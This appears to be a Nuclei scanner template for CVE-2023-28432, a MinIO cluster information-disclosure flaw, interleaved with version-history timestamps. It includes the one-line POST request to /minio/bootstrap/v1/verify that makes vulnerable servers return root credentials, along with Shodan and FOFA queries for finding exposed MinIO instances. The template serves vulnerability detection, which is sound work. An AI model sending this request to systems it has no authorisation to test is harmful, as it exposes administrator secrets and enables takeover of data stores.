2023-03-23 15:45:48 +00:00
id : CVE-2023-28432
2023-04-10 19:14:35 +00:00
2023-03-23 15:45:48 +00:00
info :
2023-04-10 19:14:35 +00:00
name : MinIO Cluster Deployment - Information Disclosure
2023-03-23 15:45:48 +00:00
author : Mr-xn
severity : high
2023-03-23 16:17:27 +00:00
description : |
2023-04-10 19:14:35 +00:00
MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted.
2023-09-06 11:43:37 +00:00
remediation : All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
2023-03-23 15:45:48 +00:00
reference :
2023-03-23 15:53:34 +00:00
- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
- https://github.com/minio/minio/pull/16853/files
2023-03-23 15:45:48 +00:00
- https://github.com/golang/vulndb/issues/1667
- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
2023-04-10 19:14:35 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-28432
2023-03-23 15:45:48 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2023-28432
2023-10-14 19:50:16 +00:00
cwe-id : CWE-200,NVD-CWE-noinfo
2023-10-16 10:55:14 +00:00
epss-score : 0.1675
epss-percentile : 0.95425
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
2023-03-23 16:17:27 +00:00
metadata :
2023-07-04 09:41:55 +00:00
verified : true
2023-09-06 11:43:37 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : minio
product : minio
2023-09-06 11:43:37 +00:00
shodan-query : title:"Minio Console"
fofa-query : app="Minio"
2023-04-24 12:46:24 +00:00
tags : cve,cve2023,minio,console,exposure,kev
2023-03-27 06:26:00 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-23 15:45:48 +00:00
- raw :
- |+
POST /minio/bootstrap/v1/verify HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-03-23 16:17:27 +00:00
- '"MINIO_ROOT_PASSWORD":'
- '"MINIO_ROOT_USER":'
2023-07-04 09:16:26 +00:00
- '"MinioEnv":'
condition : or
2023-03-23 16:17:27 +00:00
2023-03-23 15:45:48 +00:00
- type : word
part : header
words :
2023-03-23 16:17:27 +00:00
- 'text/plain'
2023-03-23 15:45:48 +00:00
- type : status
status :
2023-04-10 19:14:35 +00:00
- 200